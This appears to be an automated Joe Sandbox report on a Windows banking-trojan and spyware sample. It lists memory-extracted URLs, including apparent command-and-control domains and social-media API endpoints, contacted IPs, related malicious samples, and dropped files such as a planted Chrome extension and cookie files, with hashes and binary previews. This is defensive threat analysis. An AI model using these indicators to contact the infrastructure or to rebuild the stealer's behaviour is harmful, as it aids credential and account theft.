https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmp | false | | high
https://1C5491A87D65F1EF.club/ | 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | h1GodtbhC8.exe, 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.dr | false | URL Reputation: safe (x3) | unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search | 1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmp | false | | high
http://nsis.sf.net/NSIS_ErrorError | h1GodtbhC8.exe | false | | high
https://twitter.com/ | 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | false | | high
https://api.twitter.com/1.1/statuses/update.json | 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | false | | high
https://upload.twitter.com/i/media/upload.json | 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | 1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmp | false | | high
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | h1GodtbhC8.exe, 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.dr | false | URL Reputation: safe (x3) | unknown
https://twitter.com/compose/tweetsec-fetch-mode: | 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | false | | high
http://nsis.sf.net/NSIS_Error | aliens.exe, aliens.exe, 00000004.00000002.627075353.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe, 00000015.00000002.825159947.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe, 00000019.00000000.617074635.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe.4.dr | false | | high
http://EF6DF4AF06BA6896.xyz/info/g | 1E1C360C582DF797.exe, 00000015.00000003.574995047.0000000005D4C000.00000004.00000001.sdmp | false | | unknown
http://EF6DF4AF06BA6896.xyz/info/r | 1E1C360C582DF797.exe, 00000015.00000003.574894827.0000000002559000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://1C5491A87D65F1EF.club/Info_t/up | 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.usertrust. | 1E1C360C582DF797.exe, 00000015.00000003.582989815.0000000005D44000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | h1GodtbhC8.exe, 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.dr | false | URL Reputation: safe (x3) | unknown
http://EF6DF4AF06BA6896.xyz/info/dddi_u | 1E1C360C582DF797.exe, 00000015.00000002.827057199.0000000004150000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | unknown
https://www.messenger.com/accept: | 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | false | | high
http://EF6DF4AF06BA6896.xyz/ | 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmp | false | | unknown
http://ocsp.usertrus | 1E1C360C582DF797.exe, 00000015.00000003.582989815.0000000005D44000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0 | 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | false | |
                                                                                                                            high
                                                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              https://feedback.googleusercontent.com1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                http://www.sodown.xyz/in1E1C360C582DF797.exe, 00000015.00000002.824956152.0000000000196000.00000004.00000001.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmpfalse
                                                                                                                                  high

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
172.67.142.39 | unknown | United States | 13335 | CLOUDFLARENETUS | false
104.28.4.129 | unknown | United States | 13335 | CLOUDFLARENETUS | false

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 327203
Start date: 05.12.2020
Start time: 08:39:26
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 16m 19s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: h1GodtbhC8.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Run with higher sleep bypass
Number of analysed new started processes analysed: 40
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.bank.troj.spyw.evad.winEXE@31/50@223/4
EGA Information: Failed
HDC Information:
• Successful, ratio: 36.9% (good quality ratio 35.7%)
• Quality average: 79.9%
• Quality standard deviation: 25.4%
HCA Information: Failed
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Sleeps bigger than 120000ms are automatically reduced to 1000ms
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 13.88.21.125, 40.88.32.150, 92.122.144.200, 51.104.139.180, 2.20.142.209, 2.20.142.210, 92.122.213.247, 92.122.213.194, 20.54.26.129, 51.11.168.160, 52.155.217.156, 104.83.120.32, 40.126.1.142, 20.190.129.24, 20.190.129.160, 20.190.129.19, 40.126.1.166, 20.190.129.17, 20.190.129.133, 40.126.1.145, 93.184.220.29, 168.61.161.212, 152.199.19.161, 20.190.129.130, 40.126.1.130, 20.190.129.2, 51.104.136.2
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, cs9.wac.phicdn.net, www.tm.lg.prod.aadmsa.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, www.tm.a.prd.aadg.trafficmanager.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, skypedataprdcoleus15.cloudapp.net, go.microsoft.com, ocsp.digicert.com, login.live.com, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, ie9comview.vo.msecnd.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus17.cloudapp.net, settings-win.data.microsoft.com, a767.dscg3.akamai.net, login.msa.msidentity.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, dub2.current.a.prd.aadg.trafficmanager.net, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus15.cloudapp.net, cs9.wpc.v0cdn.net
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

Match | Associated Sample Name / URL | Detection | Context

iplogger.org:
YzvGNYMkTT.exe | malicious | 88.99.66.31
zeppelin.exe | malicious | 88.99.66.31
6GwRAlSS4F.exe | malicious | 88.99.66.31
Hlxj8nfBay.exe | malicious | 88.99.66.31
7z6cDuH7Md.exe | malicious | 88.99.66.31
cpMHTTwNC1.exe | malicious | 88.99.66.31
IaGdBpfkmV.exe | malicious | 88.99.66.31
A5RsEkXArf.exe | malicious | 88.99.66.31
KeJ7Cl7flZ.exe | malicious | 88.99.66.31
XC65ED9or6.exe | malicious | 88.99.66.31
cli.exe | malicious | 88.99.66.31
R7w74RKW9A.exe | malicious | 88.99.66.31
pqSZtQiuRy.exe | malicious | 88.99.66.31
a3d224d6da883da2d8ba5671ab64ed24.exe | malicious | 88.99.66.31
a3d224d6da883da2d8ba5671ab64ed24.exe | malicious | 88.99.66.31
SecuriteInfo.com.ArtemisE8B534F89B0F.exe | malicious | 88.99.66.31
SecuriteInfo.com.Trojan.PWS.Siggen2.59718.4609.exe | malicious | 88.99.66.31
SecuriteInfo.com.Trojan.PWS.Siggen2.59485.31175.exe | malicious | 88.99.66.31
2rYTU7Mzo9.exe | malicious | 88.99.66.31
3MndTUzGQn.exe | malicious | 88.99.66.31

EF6DF4AF06BA6896.xyz:
h1GodtbhC8.exe | malicious | 172.67.194.30

ASN

Match | Associated Sample Name / URL | Detection | Context

CLOUDFLARENETUS:
h1GodtbhC8.exe | malicious | 172.67.194.30
OncoImmune.xlsx | malicious | 104.16.19.94
SecuriteInfo.com.Trojan.DownLoader36.26314.8898.exe | malicious | 162.159.138.232
SecuriteInfo.com.Trojan.InjectNET.14.12461.exe | malicious | 172.67.188.154
https://healtymed.com/ADOBE.html | malicious | 104.18.44.229
SecuriteInfo.com.Generic.mg.40a8bc3e38349e37.exe | malicious | 104.31.85.117
http://test.kunmiskincare.com/index.php | malicious | 104.18.22.230
Stolen_Images_Evidence.js | malicious | 104.18.43.92
https://nursing-theory.org/nursing-theorists/Isabel-Hampton-Robb.php | malicious | 172.67.13.182
dor001.exe | malicious | 23.227.38.74
SHIPPING.EXE | malicious | 172.67.160.246
SKY POUNDS.exe | malicious | 104.24.127.89
https://www.samsungsds.com/us/en/solutions/bns/high-performance-computing/hpc-managed-services.html | malicious | 104.26.7.139
Documento de transferencia de Scotiabank7497574730084doc.exe | malicious | 172.67.143.180
Document N0-BR1702Q667420_12.exe | malicious | 172.67.143.180
proforma invoice5087713.xls | malicious | 104.28.4.151
mCiZXEeKax.exe | malicious | 104.18.53.69
OKx5tyuiLx.exe | malicious | 104.26.2.232
RFQ.xls | malicious | 162.159.135.232
https://maxhealth-conm.cf/?login=do | malicious | 104.16.19.94

CLOUDFLARENETUS:
h1GodtbhC8.exe | malicious | 172.67.194.30
OncoImmune.xlsx | malicious | 104.16.19.94
SecuriteInfo.com.Trojan.DownLoader36.26314.8898.exe | malicious | 162.159.138.232
SecuriteInfo.com.Trojan.InjectNET.14.12461.exe | malicious | 172.67.188.154
https://healtymed.com/ADOBE.html | malicious |
                                                                                                                                  • 104.18.44.229
                                                                                                                                  SecuriteInfo.com.Generic.mg.40a8bc3e38349e37.exeGet hashmaliciousBrowse
                                                                                                                                  • 104.31.85.117
                                                                                                                                  http://test.kunmiskincare.com/index.phpGet hashmaliciousBrowse
                                                                                                                                  • 104.18.22.230
                                                                                                                                  Stolen_Images_Evidence.jsGet hashmaliciousBrowse
                                                                                                                                  • 104.18.43.92
                                                                                                                                  https://nursing-theory.org/nursing-theorists/Isabel-Hampton-Robb.phpGet hashmaliciousBrowse
                                                                                                                                  • 172.67.13.182
                                                                                                                                  dor001.exeGet hashmaliciousBrowse
                                                                                                                                  • 23.227.38.74
                                                                                                                                  SHIPPING.EXEGet hashmaliciousBrowse
                                                                                                                                  • 172.67.160.246
                                                                                                                                  SKY POUNDS.exeGet hashmaliciousBrowse
                                                                                                                                  • 104.24.127.89
                                                                                                                                  https://www.samsungsds.com/us/en/solutions/bns/high-performance-computing/hpc-managed-services.htmlGet hashmaliciousBrowse
                                                                                                                                  • 104.26.7.139
                                                                                                                                  Documento de transferencia de Scotiabank7497574730084doc.exeGet hashmaliciousBrowse
                                                                                                                                  • 172.67.143.180
                                                                                                                                  Document N0-BR1702Q667420_12.exeGet hashmaliciousBrowse
                                                                                                                                  • 172.67.143.180
                                                                                                                                  proforma invoice5087713.xlsGet hashmaliciousBrowse
                                                                                                                                  • 104.28.4.151
                                                                                                                                  mCiZXEeKax.exeGet hashmaliciousBrowse
                                                                                                                                  • 104.18.53.69
                                                                                                                                  OKx5tyuiLx.exeGet hashmaliciousBrowse
                                                                                                                                  • 104.26.2.232
                                                                                                                                  RFQ.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.159.135.232
                                                                                                                                  https://maxhealth-conm.cf/?login=doGet hashmaliciousBrowse
                                                                                                                                  • 104.16.19.94

JA3 Fingerprints

Match | Associated Sample Name / URL | Detection | Context
ce5f3254611a8c095a3d821d44539877 | mCiZXEeKax.exe | malicious | 172.67.142.39
 | nd2fpgcp.dll | malicious | 172.67.142.39
 | d60iis2l.dll | malicious | 172.67.142.39
 | 2ndgr.msi | malicious | 172.67.142.39
 | mediasvc copy.dll | malicious | 172.67.142.39
 | usz.exe | malicious | 172.67.142.39
 | 2020-12-03_08-45-45.exe.exe | malicious | 172.67.142.39
 | 20-091232.xlsx | malicious | 172.67.142.39
 | ipsjz17z.dll | malicious | 172.67.142.39
 | uzutwotm.exe | malicious | 172.67.142.39
 | q9y42trS7z.exe | malicious | 172.67.142.39
 | IaGdBpfkmV.exe | malicious | 172.67.142.39
 | Vuu0hnOqjF.exe | malicious | 172.67.142.39
 | Eptinaub3.dll | malicious | 172.67.142.39
 | otaxujuc64.dll | malicious | 172.67.142.39
 | Donorcasino.dll | malicious | 172.67.142.39
 | Visitreflect.dll | malicious | 172.67.142.39
 | Lijocn.dll | malicious | 172.67.142.39
 | MT103---USD42,880.45---20201127--dbs--9900.exe | malicious | 172.67.142.39
 | KeJ7Cl7flZ.exe | malicious | 172.67.142.39

Dropped Files

Match | Associated Sample Name / URL | Detection
C:\Program Files (x86)\71eza90awf48\aliens.exe | h1GodtbhC8.exe | malicious
C:\Users\user\AppData\Local\Temp\nsqEF29.tmp\Sibuia.dll | h1GodtbhC8.exe | malicious
 | KeJ7Cl7flZ.exe | malicious
C:\ProgramData\sib\{7C999AAA-0000-487E-97BD-7619B45532F4}\SibClr.dll | h1GodtbhC8.exe | malicious
 | KeJ7Cl7flZ.exe | malicious
C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\SibClr.dll | h1GodtbhC8.exe | malicious
 | KeJ7Cl7flZ.exe | malicious
C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | h1GodtbhC8.exe | malicious

Created / dropped Files

C:\Program Files (x86)\71eza90awf48\aliens.exe
Process: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 506545472
Entropy (8bit): 0.13665136586177498
Encrypted: false
SSDEEP:
MD5: 87698F069716708B6743A580B1D0D0CC
SHA1: 6E8585C0596C41CEAF1EEA7E8AEEFF3393A4F126
SHA-256: 6781F617A3F74D85AC7113828B2BE7D0186E32259FD6B4C10E18C6233CB97549
SHA-512: B92564EB4995FD6637F8EAECD6AAC285C8527DECEDF21D423491F98040962ABACFA4F27977E43DA7ED8DCF4B190156DA5EFAF146E2DD76FB0E51D77476F65D3E
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Joe Sandbox View:
• Filename: h1GodtbhC8.exe, Detection: malicious
Reputation: low
                                                                                                                                                  Preview: MZ......................@............................................@.....3.!This program cannot be run in DOS mode....$.......g.&.#aH.#aH.#aH..?L.%aH.N<N. aH.N<I.,aH.#aI..aH..?L.(aH..?.."aH..?J."aH.Rich#aH.........................PE..L....sQY.................v....... .. 9............@.................................Ti....@.............................................0...........l..89..........p...T..............................@............................................text...bt.......v.................. ....rdata..(#.......$...z..............@..@.data...............................@....ndata... ...`...........................rsrc....0.......2..................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................
C:\ProgramData\sib\{7C999AAA-0000-487E-97BD-7619B45532F4}\SibCa.dll
Process: C:\Users\user\Desktop\h1GodtbhC8.exe
File Type: data
Category: dropped
Size (bytes): 4096
Entropy (8bit): 6.867501832742936
Encrypted: false
SSDEEP: 96:PAWqGuIO1w7JElw764ulqk4uWdCXufAx8Su2yk:oWaIO1S7ulqBhv+yk
MD5: 04F3C7753A4FCABCE7970BFA3B5C76FF
SHA1: 34FC37D42F86DAC1FD1171A806471CDFEAE9817B
SHA-256: A735E33A420C2AD93279253BC57137947B5D07803FF438499AAAF6FD0692F4CD
SHA-512: F774FC3F3EBF029DC6F122669060351CC58AE27C5224ABE2A6C8AB1308C4B796657D2F286760EB73A2AE7563EEEF335DAA70ED5E4B2560D34CA9873017658AFE
Malicious: false
                                                                                                                                                  Preview: ..MZ.........0......8-..@.8.0..p.........!...L.!This. program. cannot .be run i.n DOS mo.de....$...PE..L....d82........!..0............. ..B................... ...........@..*..-......#......`....O...+h..........(.Q..........8W.....O......HA...text..........u.[.......`.rsrc...M;.}.t.......@.0relo...U..)......B.......5...&......S..4o.......F.......s....(.....*..(....{.%...{.9....[...4.*..(".....}...."}A...}....D.}..6..B.(...+**D...* 6..si.......*...0.....,....(.....~......oRj..*&.....N"(@M.-...on.A..0......!H.(...o...."r..p(...(.E..r@.po.@.....o..........%.B.....(.@........o...&..% ....o.x......u...,..B...o!..B!....!...~...Tu.."..[......#E..8...o"..$Q ....c..o....*..*..`......IT..G.:. `....@;.`.0...`. 5.@.r?..pB1..s#.....A.R.%.r..p.%.DrW...%..*rFq .b*..s....%.o%@.%.oB&....o'...Do(..........o)......"o.>.o+..,oE..,a..+?.,-.@.t.7.a-%o......Yo/.../.o.].....-...r..../. #"...1..-......u.>....., ...o2......#...>....L....X..a"0.$..V..h".r..."3a..r.`.rZ@..p.(4 ....+!rh..c.B..r...po..D.U.*..*.
C:\ProgramData\sib\{7C999AAA-0000-487E-97BD-7619B45532F4}\SibClr.dll
Process: C:\Users\user\Desktop\h1GodtbhC8.exe
File Type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 52520
Entropy (8bit): 6.011934677477037
Encrypted: false
SSDEEP: 1536:9GyM4uxlvOe/c1xpfLIa97v3A5KobiPWh:9G1vt/g7fLb97Y5VmY
MD5: 928E680DEA22C19FEBE9FC8E05D96472
SHA1: 0A4A749DDFD220E2B646B878881575FF9352CF73
SHA-256: 8B6B56F670D59FF93A1C7E601468127FC21F02DDE567B5C21A5D53594CDAEF94
SHA-512: 5FBC72C3FA98DC2B5AD2ED556D2C6DC9279D4BE3EB90FFD7FA2ADA39CB976EBA7CB34033E5786D1CB6137C64C869027002BE2F2CAD408ACEFD5C22006A1FEF34
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: h1GodtbhC8.exe, Detection: malicious
• Filename: KeJ7Cl7flZ.exe, Detection: malicious
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d82............!..0.................. ........... ....................... ............@.....................................O.......h...............(...............8............................................ ............... ..H............text........ ...................... ..`.rsrc...h...........................@..@.reloc..............................@..B........................H........S..4o..........................................................F......s....(....*..(....*..{....*..{....*..{....*..{....*..(......}......}......}.......}....*6..{....(...+**..{......*6..si........*...0...........(.....~........oj...*&~.......*N(....-.~.....on...*.0..........(....o......r...p(....(....r...po.......o...........%.~.......(..........o....&........o .......u....,.~......o!...on... ...!...~..u....,.~......o!...on... ..."...[..u....,.~......o!...on... ...#
C:\ProgramData\sib\{7C999AAA-0000-487E-97BD-7619B45532F4}\sib.dat
Process: C:\Users\user\Desktop\h1GodtbhC8.exe
File Type: data
Category: dropped
Size (bytes): 1864
Entropy (8bit): 4.120386562888434
Encrypted: false
SSDEEP: 48:1AC+F9cbv+WfJBHIxp3Cub2/SG+Degz21A:W3M/xBH+yTSG+S9A
MD5: F3C315D955C48E6071E1BC1C87C46FD7
SHA1: 82340C833CAC7048E1A58A3EC40EB4540535E2A4
SHA-256: D09D9E3F16C53ABEB7F25D408F686C708C6240971FC46AF7BF68EC5BD7846724
SHA-512: 7D7C1AF8549E21A045B9983D7B67BBA347823955B829A4ACFB0DD1878DBB34D7EA320B3FA9D7F5FF028E2793B5B852B668BFE4213FFF8678FB87B9F7B4295256
Malicious: false
                                                                                                                                                  Preview: ...&{.7.C.9.9.9.A.A.A.-.B.9.1.E.-.4.8.7.E.-.9.7.B.D.-.7.6.1.9.B.4.5.5.3.2.F.4.}.....p.3.........................a.d.m.i.n.....0...0...0.............I.:.\.n.e.w._.k.i.l.l.\.p.3.\.e.x.e.....p.3.(.1.)...e.x.e..E.{. "appVersion": "6.0.8",. "arpNoRemove": true,. "arpNoRepair": true,. "arpNoShow": true,. "lang": "en-US",. "productCode": "{7C999AAA-0000-487E-97BD-7619B45532F4}",. "uiScriptTest": false,. "uid": "{FC53B0A8-C9C1-4544-9DD9-C73A991A2A42}",. "upgradeCode": "{9FF45220-3173-4DBF-A859-03B8BC20235F}".}...!%.S.y.s.t.e.m.R.o.o.t.%.\.S.y.s.t.e.m.3.2.\.S.H.E.L.L.3.2...d.l.l.,........................................................&{.0.0.7.6.C.E.B.B.-.D.4.4.3.-.4.3.C.7.-.9.2.A.5.-.C.4.8.7.F.2.B.5.F.5.4.A.}.........s.e.t.u.p.........I.:.\.n.e.w._.k.i.l.l.\.p.3.\.s.e.t.u.p...e.x.e.................T.e.m.p.\.0.\.s.e.t.u.p...e.x.e.....-.s.........................................]{."ignoreFailure": false,."uiDisabled" : false,."uiHidden" : false,."uiUnSelected" : false
                                                                                                                                                  C:\Users\user\AppData\Local\Cookies1607186571999
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Cookies1607186582639
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Cookies1607186588295
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\background.js
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\book.js
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\icon.png
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\icon48.png
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
